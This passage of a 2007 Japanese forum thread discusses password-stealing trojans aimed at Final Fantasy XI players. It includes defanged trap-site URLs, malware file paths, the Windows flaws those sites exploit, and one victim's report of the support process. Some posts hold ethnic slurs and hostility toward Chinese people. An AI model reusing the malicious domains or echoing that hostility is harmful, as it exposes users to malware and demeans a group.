サイズが近いし、ばらまき方が同じだから亜種だと思う。
497 :既にその名前は使われています:2007/10/17(水) 06:30:56.02 ID:yGyY8X/m
291 名前:既にその名前は使われています[] 投稿日:2007/10/16(火) 19:06:28.09 ID:7/4KKOtC
ああ、%SYSTEMDIR%\systemlf.dll も作ってた。これはリソースに収められているDLL。
こいつらの亜種らしい。
・マカフィー
ttp://www.mcafee.com/japan/security/virPQ2006.asp?v=PWS-FFantasy
・トレンドマイクロ
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_FANTASY.C&VSect=Td
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_AGENT.RDU&VSect=Td
NISでも実行時には検出されるのかな。検体を提出しておいたシマンテックから
「自動処理で検出できないので人力解析に回しとくよ」というメールが今来た。
取りあえず、次の2つのファイルが存在したら危険。
C:\WINDOWS\system32\explorerf.exe
C:\WINDOWS\system32\systemlf.dll
だそうだ
498 :既にその名前は使われています:2007/10/17(水) 08:20:48.62 ID:t72DLL8T
VIPにも貼るか?
前回の経緯のヤツをw
499 :既にその名前は使われています:2007/10/17(水) 09:04:09.19 ID:okXdb9kl
怪しいURLが張ってあってIP検索したら発信元が北京、上海だった。
日本のプロバイダー経由でスパムしてるって書いてあることが多いけど
うちのBLOGの中華系書き込みは全部IP検索したら中国内のプロバイダーも中国系だ
IP晒していい?
500 :既にその名前は使われています:2007/10/17(水) 09:11:01.09 ID:O4i5Co9/
>487
効果は期待できないんじゃないかな
踏み台やネカフェみたいな一時利用の所だと意味無いし
501 :既にその名前は使われています:2007/10/17(水) 09:15:43.76 ID:dgamHJvp
>>495
かっぱらい先のキャラ突きとめても、警察沙汰にならんとアイテム返還できないってさ(GM談
不正アクセスによる窃盗だろうが、RMTよりヤバイだろ
■、頭大丈夫か
502 :既にその名前は使われています:2007/10/17(水) 09:48:24.87 ID:QFuwPA6m
うちのサイトに「天安門」のフレーズを埋め込んでたら
誰かが百度から「天安門」でやってきた形跡があった(´・ω・`)
503 :既にその名前は使われています:2007/10/17(水) 10:33:18.56 ID:okXdb9kl
IP address [?]: 222.78.100.16○
IP address country: China
IP address state: Beijing
IP address city: Beijing
IP address latitude: 39.92890○
IP address longitude: 116.38829○
ISP [?]: chinanet fujian province network
Organization: chinanet fujian province network
Host: 167.100.78.22○.board.ly.fj.dynamic.163data.com.cn
一応○で伏せたけど、ホストは大体このタイプだった。
こういうのわかればツーホーできる?
504 :既にその名前は使われています:2007/10/17(水) 10:36:03.20 ID:RFn/OCI3
中国に通報しても無駄に決まってるだろw
505 :既にその名前は使われています:2007/10/17(水) 10:38:02.93 ID:okXdb9kl
いや、日本側はこういうIPに対してなにも対応してくれないのかなって
506 :既にその名前は使われています:2007/10/17(水) 10:43:29.02 ID:RFn/OCI3
HPの管理人がそのアドレスを弾く、くらいしか無理だろw
507 :既にその名前は使われています:2007/10/17(水) 10:43:35.03 ID:87efpf9X
>>432
普通のブログも混じってるな。一番下のfc2のやつとか。
fc2の前にドットがないドメインが怪しい。FC2ブログっぽく見せて釣ろうとしてるくさい。
508 :既にその名前は使われています:2007/10/17(水) 10:57:31.02 ID:NVMNMs76
>>507
フレームで罠サイトと外部のブログを呼び出してるね
blogの本当のURLは↓
www2u■biglobe■ne■jp/~K340/ff11/ffdiary.htm
でも ff11link■blog122■fc2■com をあぼーんするのは正解でしょ
fc2のこのサイトを作った人は明らかに悪意があるわけだし
ただこの場合、大元の www■yyjjoopp■com をあぼーんしておかないとキリなくなるやね
509 :既にその名前は使われています:2007/10/17(水) 10:58:44.70 ID:uet6sHUk
一番下のは、このスレの>>336。
>>338-362辺りで叩かれまくってるw
>>347の上にある2つ
tp://www■yyjjoopp■com/main.htm
tp://www2u■biglobe■ne■jp/~K340/ff11/
確認してないけど、これも危険サイトという認識で良いのかな?
510 :既にその名前は使われています:2007/10/17(水) 11:00:03.71 ID:uet6sHUk
あ、かぶった。>>508で理解したサンクス。
511 :既にその名前は使われています:2007/10/17(水) 11:05:09.78 ID:87efpf9X
うお、そういうことだったのか。
試しに>>432をアグスで1コずつ調べてみたら「なんだ普通のサイトもあるじゃん…」
と思ってたんだけど、フレームか。
スクリーンショットだけで判断はできんな……スマソ
512 :既にその名前は使われています:2007/10/17(水) 11:10:00.47 ID:87efpf9X
>>509
下のURLはフレーム内の呼び出し先のホームページだね。それ自体は無害…と思う。
勝手にスケープゴートに使われてるんだとしたら可哀想だ。
もう片方のフレームに呼び出されてるのが上のURLで、本命はそっちなのかな。
513 :既にその名前は使われています:2007/10/17(水) 11:21:06.55 ID:aTL0eX1t
したらば落ちた?
514 :既にその名前は使われています:2007/10/17(水) 11:22:48.15 ID:km6MM+B8
>>432の下から3つ目は
先日スレも立った不正ツール購入者リスト載っけてた所だな。
いつの間にかツール販売者と購入者を挑発にする文に変わってるwwwwww
今の所はこのサイトも特に怪しい箇所は無いな。
むしろやり方は過激だが我々と同じくツーラーや支那畜が嫌いな人間だろう
515 :既にその名前は使われています:2007/10/17(水) 11:34:10.81 ID:NVMNMs76
tp://www■euphidime■com は、リストから削除したほうがいいね。
罠サイトじゃないし、どうやらツール購入者を批判しているね
TOPページを読むと、ツール購入者リストは、hack して入手したぽい
そもそも、販売者の鯖がセキュリティダメダメだったみたいじゃん
(外部からSQLに接続できてるわ、安易なパスワードを設定してるわでw)
ソースまで取得できちゃってるしwww
とりあえず、罠サイトリストからは削除キボン
516 :既にその名前は使われています:2007/10/17(水) 11:36:51.27 ID:nbNUn618
別に「疑わしい」とされたものは削除しないでいいんじゃね?
削除しないでも困らないし。
517 :既にその名前は使われています:2007/10/17(水) 11:42:18.34 ID:nvOcNOWH
POL接続するときパス毎回入力せずにつなげられるじゃん?
最近たまにその設定が外れててパス入力させられるんだよな・・
感染してんのかなー
上の方にあったnetstatも問題なく
>>497にあるexeもdllもなかったけどなんかこわい
518 :既にその名前は使われています:2007/10/17(水) 11:42:55.05 ID:NVMNMs76
俺は、このサイトができた時、すぐ見たんだけどさ、このサイトって元々真っ白なんだわw
(Cookie未使用、外部CSS未使用、Javascript未使用、外部ファイル取込無し)
罠だとかウィルスだとか騒いでた人は、実は購入者だったのよ(スレ内で自分で暴露したw)
んで、みんなに見られたくないから、罠だと騒いでたわけw
まー別に削除しなくても害は無いけど、
ツール購入者が得するような感じがするから、俺個人的にはリストから削除して欲しいな
519 :既にその名前は使われています:2007/10/17(水) 11:50:51.47 ID:uet6sHUk
>>518
自分もtp://www■euphidime■comを>>432のリスト前から
このスレでは初出なのにあぼーんしてたから、どこで見たのか調べたら
【みんなで】業者がまた何かしてる【通報】
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1191934759/476-477
[log]
このやり取りだった…。
520 :既にその名前は使われています:2007/10/17(水) 12:34:44.74 ID:WctyQ6XT
雑談スレから拾ってきたが、やつら日本語コメントやめたのかw
コテの人の説明だとヤバイものなのは確定らしいけど。
140 名前: keko [Tubbs19801015@hotmail.com] 投稿日: 2007/10/17(水)
11:28:29.24 ID:RFk3U3UF
all jobs helper
紹介:This tool is very nice for the mages. It macro's everthing for you. It
also detects what spells you have.
http://www■uploadfree■org/518066
164 名前: 空気コテ ◆AIR..o0rvE [sage] 投稿日: 2007/10/17(水) 12:23:03.95
ID:Yr3LXTvc
わいわいカキコが落ちててしょんぼり(´・ω・`)
140のサイトは
Registrant Country:CN
リネージュ資料室に載ってないドメインです。
なので踏まないようにちゅういなんです。
521 :既にその名前は使われています:2007/10/17(水) 12:43:41.50 ID:GiZ6WkMe
普通に犯罪なのに取り締まれないってのが歯痒いな
522 :既にその名前は使われています:2007/10/17(水) 13:02:41.43 ID:7sccJxiK
■製作自体が感染したらさすがに何とかしてくれる?
523 :既にその名前は使われています:2007/10/17(水) 13:21:55.27 ID:C1Mapr8a
■eも単に注意を促すだけでなく、救済してやればいいのにな。
中華どもの攻撃で結果的に上得意を手放すってもったいないだろ。
本人確認できたらデータロールバックしてやって、
不正アクセスされてた間のログを追跡して業者関連垢を徹底的にBANくらいはせんと。
524 :既にその名前は使われています:2007/10/17(水) 13:30:29.12 ID:cidZhTXY
捨てられたエクレアの復活はともかく、
他のアイテムとギルは業者が偽装被害者も用意すればdupeの元になる。
525 :既にその名前は使われています:2007/10/17(水) 13:39:27.57 ID:AkH+EsCY
まーでも被害にあったキャラを受け取ったキャラはBAN出来るよね
526 :既にその名前は使われています:2007/10/17(水) 13:45:31.22 ID:2TNSAxXF
暗号が解読出来ないからバス保存ファイルを削除
削除されると再入力しないといけないから、キーボードからの入力を監視
なんていう手口もあると聞いた
527 :既にその名前は使われています:2007/10/17(水) 14:19:56.60 ID:cidZhTXY
偽装被害者から高額素材を業者の捨てキャラへ。
捨てキャラが出品した素材を一般人Aが買う。
Aはそれを合成したものをBに売る。
救済で被害者に素材が復活、捨てキャラはBAN。ギルを買ったCが居ればそれもBAN。
ここまでは良いとして
AとBや他合成素材に関ったプレイヤーのアイテムとギルはどうなる?
既に素材は1つ増えているし、ギルは凍結されているが業者は現金を得ている。
528 :既にその名前は使われています:2007/10/17(水) 14:20:08.61 ID:cidZhTXY
仮に本当の被害者だとしても
業者の最終目的はギルやアイテムじゃなくて現金だから、
一度引っかかって救済された人の中に
駆除やセキュリティの甘い人が居れば復活分がまた資金源になってしまう。
529 :既にその名前は使われています:2007/10/17(水) 14:40:07.07 ID:stSmu8fP
中国語をお使いの方がただいまFF11ブログに罠リンク書きこみ中…
”前から、気になっていたんだけどw
勝手にリンクさせて頂きますm(__)m
(以下略)”
リンク先は
fcty-net■com/jplink
530 :既にその名前は使われています:2007/10/17(水) 14:42:47.60 ID:AkH+EsCY
つーわけで救済は無いだろうね
531 :既にその名前は使われています:2007/10/17(水) 14:48:00.83 ID:bc8Dq06L
つうか、被害者の救済も必要だが、そういう事を起こらなくする為の対策も必要だろ
せっかくダウンロードではなくパッケージ販売なんだからさ、
こういうのつけて対策しろよ
ttp://www.japannetbank.co.jp/token/onetime/index.html
532 :既にその名前は使われています:2007/10/17(水) 15:04:13.41 ID:bYzdKsuk
こういう罠ってFF11入ってないPCだとどんな症状になるの?
533 :既にその名前は使われています:2007/10/17(水) 15:07:39.96 ID:AkH+EsCY
そりゃ何が仕込まれてるかによるわなw
534 :既にその名前は使われています:2007/10/17(水) 15:09:29.05 ID:9w/1s6bT
トロイでも仕込まれてクレジットカードの情報抜かれたりするかもしれないから、触れない方が吉だろ。
ウィルスまで仕込む業者が金を稼ぐのための手段をFFに限定すとも思えん。
535 :既にその名前は使われています:2007/10/17(水) 15:16:09.49 ID:pS0o1qfW
>>531
現金がかかわる銀行のセキュリティとネットゲームのセキュリティを同レベルにってのはさすがに無茶だろw
536 :既にその名前は使われています:2007/10/17(水) 15:34:36.61 ID:Uvmr4zHj
一緒くたにしてるユーザーは多いんだよな
537 :既にその名前は使われています:2007/10/17(水) 15:44:28.97 ID:JUZcMjLF
行間に本音が滲んでバレバレって、みっともないね
538 :既にその名前は使われています:2007/10/17(水) 15:44:38.24 ID:NVMNMs76
>>529
fcty-net 自体は、MS07-017 (2007/03) の脆弱性をつついてくる
更に、フレームで blogplaync (既にリスト入り) を呼び出して(king.htm)
MS06-014 (2006/04) の脆弱性をつついてくる。
共に Windows Up Date してあれば大丈夫
fcty-net もテンプレ入りした方がいいね (でも、まじキリがないぞこれ・・・
539 :既にその名前は使われています:2007/10/17(水) 15:46:06.01 ID:bSAdnEGu
>>535
まあそうだが、■eは客から金取ってるのに対して、ジャパンネット銀行は口座開設無料だぞ
取引手数料取られる事はあるが、それでも■eの課金より安いだろ・・・
540 :既にその名前は使われています:2007/10/17(水) 15:50:26.89 ID:4oiyDmVj
>>539
ネットゲームの課金と銀行の仕組みを比べること自体がおかしいと思うw
541 :既にその名前は使われています:2007/10/17(水) 15:55:09.40 ID:bSAdnEGu
>>540
まあ、たまたまトークンなんてネットバンキングで使われていただけで
パッケージにつけて販売して、値段が高騰するような高いものでは無いだろ
542 :既にその名前は使われています:2007/10/17(水) 15:56:33.00 ID:K4X13hMk
銀行の話は例えってことでいいじゃまいか
毎月課金してるんだから安心して遊びたいっていう心理が理解できないような馬鹿でもないんだろうに
543 :既にその名前は使われています:2007/10/17(水) 15:58:21.04 ID:csVAxfRj
>>526
POL保存の、あれ、多分換字式暗号と当たりをつけてる。
めんどくさいから最後まで検証してないけど。
544 :既にその名前は使われています:2007/10/17(水) 16:05:33.31 ID:pS0o1qfW
>>541
トークンだけじゃすまないと思うよw
それを受け入れるために認証系のシステムを一掃しないといけないからねぇ。
545 :既にその名前は使われています:2007/10/17(水) 16:05:44.65 ID:bSAdnEGu
換字式暗号と言うものがよく分からなかったのでググって見たが、
えらく昔からある暗号だな・・・
546 :既にその名前は使われています:2007/10/17(水) 16:06:15.34 ID:pS0o1qfW
一新だw
掃除してどするw
547 :既にその名前は使われています:2007/10/17(水) 16:50:28.68 ID:NVMNMs76
今は携帯電話を利用したワンタイムパスワードもあるよ
tp://japan.zdnet.com/security/story/0,3800079245,20102410,00.htm
ここまで本格的にしなくても、ログインしたい時だけ空メールを送信して、
返信でパスワードが携帯メールで送られてくるようなワンタイムパスワードもどきでも十分効果はあると思うんだけどなー
これなら、携帯アプリ未使用でいけるし、
空メール送信してから一定時間過ぎたら認証できなくすればキーロガーにもある程度対応できるっしょ
希望者のみにすれば電波が入らない地域でも問題ないし、メールだから海外ユーザも問題なしw
>>543
まじで?それが本当なら■eはセキュリティ意識が低すぎだろw
(一概には言えないけど・・・)
548 :既にその名前は使われています:2007/10/17(水) 17:47:44.39 ID:2TNSAxXF
問題はリトライオンラインの時だ
お前らリトライの度にワンタイムパスワードなんて求められたら泣くぞ
549 :既にその名前は使われています:2007/10/17(水) 17:55:58.09 ID:2TNSAxXF
接続するプロバイダって毎回変わる奴って少ないと思うけど
接続する出来るプロバイダを任意に登録出来るとかどうだろう?
550 :既にその名前は使われています:2007/10/17(水) 17:58:42.77 ID:+x1wZxd3
中国人を根絶すれば問題解決じゃね?
551 :既にその名前は使われています:2007/10/17(水) 18:33:21.16 ID:IV5jAJjn
ほんと中国はどうしようもないな
ビリーズブーとキャンプもコピーして売りまくってるって言うし。
中国製 製品や食べ物は絶対買わね。
552 :既にその名前は使われています:2007/10/17(水) 18:35:39.47 ID:TLNTe3mI
雑談スレにもキター
ほんとちょっと対策とって貰わないと困るぞこれ
553 :既にその名前は使われています:2007/10/17(水) 18:45:26.51 ID:mBKcp6+E
普段は「わかったにゃー」、とか「はああああああああ!」、とか「ちるまんシュシュシュ!」、とか
言ってる奴らがいきなり半端無いPC知識を見せるから2chは怖いよな。いや、褒め言葉だけどさ。
554 :既にその名前は使われています:2007/10/17(水) 18:47:15.82 ID:5g/N5WYl
よくわからんにゃー
555 :既にその名前は使われています:2007/10/17(水) 18:50:10.22 ID:Kizc+yZG
>>551
国内の寒中から退治しないと、そこをバイパスにしてどんどん入ってくるぞ?
556 :既にその名前は使われています:2007/10/17(水) 18:54:31.08 ID:C4BJ9+rE
リネージュ資料室(ttp://lineage.nyx.bne.jp/)の危険リストに
IDやPASSを狙った危ないIPがリスト化されてて400ヶ所以上載ってる。
>>432のリストで下の4ヶ所以外は全部入ってた。
tp://tinyurl■com/
tp://www■euphidime■com
tp://www■angelfire.com■/
tp://ff11link■blog122■fc2■com
400件ここに書き出すのはあれだし、
txtファイルだし直リン貼っても良いのかな? にゃー
557 :既にその名前は使われています:2007/10/17(水) 18:57:07.42 ID:EQfZjw4i
2ちゃんに投下された分はRockさんに期待して
ものすごい勢いで広告・宣伝を報告するスレ 127
http://wannabe.fam.cx/service/link.cgi?http://qb5.2ch.net/test/read.cgi/sec2chd/1192266095/
[log]
に淡々と報告していくしかないような。
558 :既にその名前は使われています:2007/10/17(水) 19:04:36.41 ID:2uQ6LfXV
リネージュ資料室の危険リストをtextファイル化したもの是非欲しい
559 :既にその名前は使われています:2007/10/17(水) 19:05:25.37 ID:fqbOSFiF
9月の下旬にまんまと罠にかかってアイテムを根こそぎ奪われた間抜けだが、
当時雑談スレに書いたものと被るが、被害に遭った人の参考になればと思うので
その時の■の対応を書いておく。
自分は二つアカウントを持っているんだが、ふと一つの垢でログインしたときになぜか
ログインしていない自分のもう一つの垢が稼働していて、しかも鯖移動して別の鯖にいた。
それでヤラレターと気付いたのが21時頃。
そのとき既にサポセンは閉まっていたので、スクエニ公式HPの通りサブ垢からGMコールをして
乗っ取られたアカウントを停止してもらうことに。だが件名に「自分のアカウントが不正アクセスを受けています」と
書いてGMコールしたところ、結局GMからtellがあったのは24時過ぎだった。
その間ずっとフレリには自分の垢が他鯖でオンラインになっていて、気が気じゃなかった。
それから「GMにできる範囲で」という本人確認(キャラ名や所属国など)をした上で
そのアカウント所持者であると認められて、どうにか乗っ取られたアカウントを停止してもらった。
あとは一度サポセンが開いてからパスワードの再発行をするということでコール終了。
後日サポセンが開くと同時に電話をかけるものの、一時間ほど繋がらずにリダイヤルオンライン。
電話が繋がってから、レジコや住所・連絡先で本人確認をして、晴れてパスワードを再発行してもらった。
そのとき「不正アクセスについての調査を望まれますか?」と聞かれ、イエスと返事したところ、
鯖移動についてや紛失したアイテムについては全て調査の後になると言われた。(続く)
560 :既にその名前は使われています:2007/10/17(水) 19:07:04.99 ID:fqbOSFiF
(続き)
そしてようやくアカウントを取り戻してログインしたところ、まずPOLでGMとチャットしてからでないと
動けない。そこで一時間ほど待たされた。
POLの音楽を聞き続けて待ちに待ったGMチャットは「既にサポセンから連絡があったのでもういいよ」
という有り難いお言葉で即終了。その後やっとのことでFFにログイン。すぐさま各キャラの状態を確認する。
メインは鯖移動させられた上でなぜかアルテパゲート先に居た。業者の手下になっていたぽい。
EX以外の装備は身包み剥がされていた。倉庫にあったアイテムも店売りされたのか全て空だった。
その後すぐにGMコールをして、サポセンで言われたとおりに紛失したアイテムを全てtellで話す。
ついでに自分のアイテムを処分したらしきキャラクターがFFAHで見付かったのでGMに告げておいたが
「参考にします」とだけ返事があっただけだった。今でもそいつは元気にログインして流砂に篭もってる。
これが一応不正アクセスが発覚してから自分がやったことだが、いくつか気付いた事があるので次で箇条書きする
561 :既にその名前は使われています:2007/10/17(水) 19:07:15.44 ID:WctyQ6XT
流砂洞にキャラ放置されてた人か。覚えてるよ。
562 :既にその名前は使われています:2007/10/17(水) 19:09:59.74 ID:fqbOSFiF
・1〜2週間のうちに途中報告でも調査結果の連絡をすると言われたが既に2週間は過ぎた。
(同様の事件が頻発していて忙しいのかもしれないが「まだ調査中」くらい言ってほしい)
・GMに確認したところ、「たとえ何らかの救済措置があるとしても、今の状態でキャラを動かして利益を得るのは自由」とのこと
(どうせ救済措置なんか無いだろうが一応確認した。他鯖で遊んでも構わないそうだ)
・GMコールの件名は正直に書くと損をする可能性がある
(不正アクセスでコールしたときは22件待ちで3時間待たされたが、後日スタックで読んだら29件待ちにも関わらず5分で来た)
↑ちなみに3時間待って現れたGMが天安門事件で一躍有名になったClokettinだった。
あれから何年経ってるか分からないが元気にお仕事されてるようだ。
・登録してあるクレカを勝手に使われ、鯖移動代3150円の課金がされたにも関わらず調査結果待ちの一転張りで
鯖を戻すなどの対処はしてくれていない。
(POLのIDとパスワードさえ抜く事ができれば登録クレカで自由に追加課金できるシステムになってる)
・サポセンのお姉さん曰く「警察に連絡するのは調査結果の出た後にしてくれ」
(当時は混乱していて素直にハイと頷いてしまったものの、調査結果が遅れればその分通報が遅れるという悪循環だった)
・GMコール待ちオンラインにせよサポセンリダイヤルオンラインにせよ、とにかく時間がかかる。
(幸い自分は自宅警備員なので全てぶっ続けで連絡できたものの、勤め人にはかなり厳しいと思う)
563 :既にその名前は使われています:2007/10/17(水) 19:13:20.84 ID:km6MM+B8
tinyurl自体は単なる短縮URLサービス。
(このURLをクリックして表示されるページは実は全く別のURLを持つページ)
angelfireは老舗の無料HPスペース提供サイト。
今はLycosが所有してるんだったっけかなぁ。
昔から変わっていなければアカウントが出鱈目の情報で取得できる為に
こういった不正行為に良く使われる。
564 :既にその名前は使われています:2007/10/17(水) 19:13:32.08 ID:fqbOSFiF
度重なる長文失礼、これで最後のレスになる。
で、今は鯖移動されたままとにかく■の連絡を待つしかない状態。
鯖移動や鯖移動代、奪われたアイテムについても全て調査結果次第なので身動きが取れない。
アイテムは所詮データだし、ウイルス感染した迂闊な自分にも責任の一端があるので諦めもつくのだが
中華の業者のせいでリアルマネーで3150円の損害が出ているのが一番許せない。
(アイテムとギルの損害も2500万Gくらいなので、RMにすると奴らが10万円程度儲かってると思うとやりきれないが…)
あと、スペック的に常駐のウイルス監視が厳しいって奴はNOD32おすすめ。
リネとROの対策まとめHPを見てhostファイルを書き換えておくのもお忘れなく
565 :既にその名前は使われています:2007/10/17(水) 19:18:19.36 ID:i/SnmohF
FF系TBPのあちこちに何か変なTBが飛んできてる。
引数にいろいろついてるけど、サーバは全部同じだな。
tp://ypn-c200■overture■com/
566 :既にその名前は使われています:2007/10/17(水) 19:20:48.74 ID:O4i5Co9/
>なぜかアルテパゲート先
ここからも盗んだのが組織的なやつらだとわかる。
ゲート開け用のキャラに使うつもりで移動させたんだろう。
あそこ内側からなら自由に開けられるから。
垢集めて、何々用、何々用と使い分ける計画なんだろう
567 :既にその名前は使われています:2007/10/17(水) 19:40:45.90 ID:C4BJ9+rE
>>558
いぁ サイトで公開されてるファイルがtxtだから
568 :既にその名前は使われています:2007/10/17(水) 19:42:06.44 ID:SayTKdfn
あぐ
569 :既にその名前は使われています:2007/10/17(水) 19:43:03.86 ID:iIOgNQ++
>>459
この前間違ってクリックしちゃったよ・・・
画面切り替えるとき押しやすい場所にあるんだよなぁ
今のところ被害ないけど怖いな
570 :既にその名前は使われています:2007/10/17(水) 19:51:47.00 ID:pvDLosRX
FFXIAH自体は大丈夫なの?
571 :既にその名前は使われています:2007/10/17(水) 19:53:02.35 ID:kc3IePoI
>>559にはパス抜かれたときの詳しい状況を教えて欲しいな・・・
毎回パスは手打ちだったのかとかさ
572 :既にその名前は使われています:2007/10/17(水) 19:55:28.99 ID:y1Zl3/2S
うちのノーパソが、POLに再ログインしようとすると
パスが消えてる状態になってるんだけど、やばい??
573 :既にその名前は使われています:2007/10/17(水) 19:56:05.56 ID:y1Zl3/2S
ちなみにウイルスバスター20007はなにも警告ださない。
574 :既にその名前は使われています:2007/10/17(水) 19:58:54.72 ID:SPRcV5oD
>>573
それ中華のパチモンじゃね?>ウイルスバスター20007
575 :559:2007/10/17(水) 20:01:55.69 ID:fqbOSFiF
>>571
パスはPCに記憶させていた。
不正アクセスが分かって自分でログインしようとするとパスが違うと出てログインできず。
ウイルスはリネとROとFF11のパス抜きがセットになったトロイ6つとキーロガー一つ。
感染原因はoekakibbsの罠サイト(リネのまとめサイトの危険ドメインリストにある)か、うpろだの罠jpg
他にも聞きたいことがあるなら答えるよ
576 :既にその名前は使われています:2007/10/17(水) 20:04:11.47 ID:iIOgNQ++
>>575
ウィルスセキュリティソフトの反応とか
あとはSpybotで予防できそう?
577 :既にその名前は使われています:2007/10/17(水) 20:05:07.03 ID:kc3IePoI
早速ありがとう
パス記憶でも抜かれるのかー
これは気づかないうちにってこともありそうだな・・・
レジストリの起動時実行項目に変なのがなければとりあえずは大丈夫なのかな
578 :既にその名前は使われています:2007/10/17(水) 20:05:20.23 ID:IefZsUnM
>>559にはご愁傷様としか言い様が無いな・・・
犯人が他鯖でオンライン状態になってるなんて気が気じゃないよね
リアルマネーやられてるんだからすぐさま通報した方が良かったんだろうけど
スクエニでも何か不都合があるのかな、調査の後なんていつになるかわかんないのに
なんにしてもくやしいな
579 :559:2007/10/17(水) 20:11:02.69 ID:fqbOSFiF
>>576
avastとspybotを入れていたがスペック的に厳しいので常駐監視にはしていなかった。
感染後にspybotでスキャンしたが、バスターのオンラインスキャンとは結果が全然違った。
ウイルスはともかくスパイウェアの検出結果も違っていたから、あれだけでは予防は
できないと思う。海外のフリーソフトだし、新種には対応が遅いってのもありそう。
580 :既にその名前は使われています:2007/10/17(水) 20:13:38.91 ID:5anYKmEL
プレステでやれ
厨房ども
581 :572:2007/10/17(水) 20:20:42.92 ID:y1Zl3/2S
>>574
ヨドバシカメラで買いました。3年3台用。
582 :既にその名前は使われています:2007/10/17(水) 20:22:23.22 ID:jHPaRjMe
>>581
自分の書き込みをよく見てみろw
バスター二万七になってるぞ
583 :既にその名前は使われています:2007/10/17(水) 20:22:31.34 ID:u64ybxjE
ってかオンゲーやってるPCでネット関係って見るもんなの?
オレはウィルスでもなんでもokなパソコンで見てるけどなぁ
FFはハイスペックPC,2垢はPS2,ネット観覧はどうでもいいPCだろ
常識だよな?極一部の人間が騒いでるだけなのか?
584 :既にその名前は使われています:2007/10/17(水) 20:24:22.30 ID:29pIcp27
>>556
tinyurl自体は別に問題ないだろ。
585 :既にその名前は使われています:2007/10/17(水) 20:33:48.79 ID:LwhCU1bE
http://wannabe.fam.cx/service/link.cgi?http://18aho.blog.drecom.jp/
586 :559:2007/10/17(水) 20:34:51.15 ID:fqbOSFiF
結局>>583と>>580が一番の対策だと思うよ。
ネットバンクのパスワードなども入ってるPCだったからほんとに血の気が引いた。
これを書き込んでるのはパスワード系をまったく入れてないノートPCだけど
実際に被害に遭わないと、ネトゲとネット観覧を同じPCでやる人は確実に存在する
と思うし、そういう人を引っ掛ける罠が今どんどん増えているようだから
FFでも垢ハック対策まとめのHPがあるといいんだが。
587 :既にその名前は使われています:2007/10/17(水) 20:38:16.54 ID:dylZ6gH1
危機管理啓蒙age
588 :既にその名前は使われています:2007/10/17(水) 20:40:02.80 ID:dylZ6gH1
多くの人に見てもらいたいのでageますね
589 :572:2007/10/17(水) 20:41:12.26 ID:y1Zl3/2S
ごめんなさい2007です。
普通にFFをシャットダウンして、
次にログインするときにパスワードが消えていて、
また入力しなければなりません。
やばいですか?
590 :既にその名前は使われています:2007/10/17(水) 20:45:44.17 ID:TOQpWGz1
自動ログインの設定を切っているだけなのではないでしょうか?
591 :既にその名前は使われています:2007/10/17(水) 21:05:36.82 ID:u64ybxjE
やっぱ多いのか、PC今は安くなってるから
ショボイのなら5万もあれば十分なの作れるしその方が気分も楽。
それにハイスペックPCは電気も異常に食うし3Dゲーム以外じゃ勿体無いわ
まぁおれは安全対策以前に30万以上かけたPCで
エロ動画落としたりするのも泣けてくるし別にしてるw
592 :既にその名前は使われています:2007/10/17(水) 21:14:17.89 ID:lR5DTRHB
ショボいのなら一万もかからんぞw
ネットとメールだけの利用なんだろ?
593 :既にその名前は使われています:2007/10/17(水) 21:17:56.27 ID:9lK/hHNK
PS2で入ってパス変えた
ログイン時間見ても入られた様子なかった
中国うぜぇぇぇ
594 :既にその名前は使われています:2007/10/17(水) 21:18:29.04 ID:MaJspx+0
もう少しでNHKだったな
595 :既にその名前は使われています:2007/10/17(水) 21:28:34.84 ID:t72DLL8T
>>559
とっとと警察に被害届け出しちゃうとかさ
□eには「あ、動転してて忘れてました・・・」で切り抜けてしまえw
596 :既にその名前は使われています:2007/10/17(水) 21:33:20.80 ID:bJ8OSbxO
実際に被害にあったって話聞いたのは初めてだわ。おそろしいな
597 :559:2007/10/17(水) 21:42:06.67 ID:fqbOSFiF
>>595
レスが更に長くなるので割愛してたが、相談という名目で警察の専用の
窓口には連絡してある。
ただ、今の法律では不正アクセスの被害者は「アカウント所持者」ではなく
「不正アクセスされたゲーム会社」になるから、被害届をこちらで出すことはできないんだ。
そこらへんもあるから警察云々は後にしろってことだろうが、こちとらRMの被害も出てるから
できるだけ早く警察沙汰にしたいとは思ってる。
しかし警察の相談窓口から電話があったが、まず被害者はゲーム会社になるってのを
全面に出してから、まあお前の話も聞いてやるよって程度の対応だった。
IDとパスをいきなり電話で聞かれたしなw
「あーはいはいアイテム取られたんでちゅねー」くらいにしか対応してくれていないのがキツイ
アイテムはいいからクレカ課金の方で相談したいってのに。
あとは一応調査結果を待ってクレカへの対処がはっきりしてから正式に届出にいくつもり。
598 :既にその名前は使われています:2007/10/17(水) 21:43:50.16 ID:zBcZwTIz
田代砲マダー?
599 :既にその名前は使われています:2007/10/17(水) 21:50:06.69 ID:bJ8OSbxO
悪辣だな
600 :既にその名前は使われています:2007/10/17(水) 21:55:28.03 ID:t72DLL8T
>>597
なるほど、向こうも微妙に分かってないっつーか・・・
クレカの件を持ち出して、「相談」ってのはどうなんだろう
こうこうこういうケースでこういうことがあった場合、どうなりますか、詐欺ですか?みたいに
訊くだけならタダだし
余談だがこの辺保護者として訊くと、案外情報が出てきたりする
子供が〜それでクレカで実際にお金の被害が〜この場合はどうすれば〜と言う感じ
601 :既にその名前は使われています:2007/10/17(水) 22:01:28.16 ID:6KiSx1/I
FFXIAHは携帯サイトがあるからオレはそれを使ってるぞ。
あまりニュースになってないけど 中国政府RMTを全面禁止に
する法案をかけるしてるな。 どうも中国政府 RMT連中泳がせるだけ
泳がせて 世界中で悪名高くして上で一気にたたいて正義度の印象を
付けておきたいようだな。 今言ってる連中なんてもうじき駆除されるだろ
602 :既にその名前は使われています:2007/10/17(水) 22:04:05.59 ID:t72DLL8T
>>601
荒稼ぎするだけして、旨みが減ったから一斉駆除してさらにウマー、かと思ったぜ<支那政府
603 :既にその名前は使われています:2007/10/17(水) 22:04:45.81 ID:Q2VlQuDy
>>597
クレカ周りのトラブルなら、
警察より消費者相談センターの方がいいぞ
604 :559:2007/10/17(水) 22:12:47.21 ID:fqbOSFiF
>>600
なるほどなー、確かに「まず不正アクセスありき」で話を進められたから
その中のクレカの話は蔑ろにされてた気がする。
あと、自分の声(と性別)があの手の輩に舐められやすいってのもあるかもしれん。
ネット弁慶だからリアル電話だと弱気だしなw
警察に行く時は父親を同伴させた方が良さそうだ、いい年こいて・・・
>>603
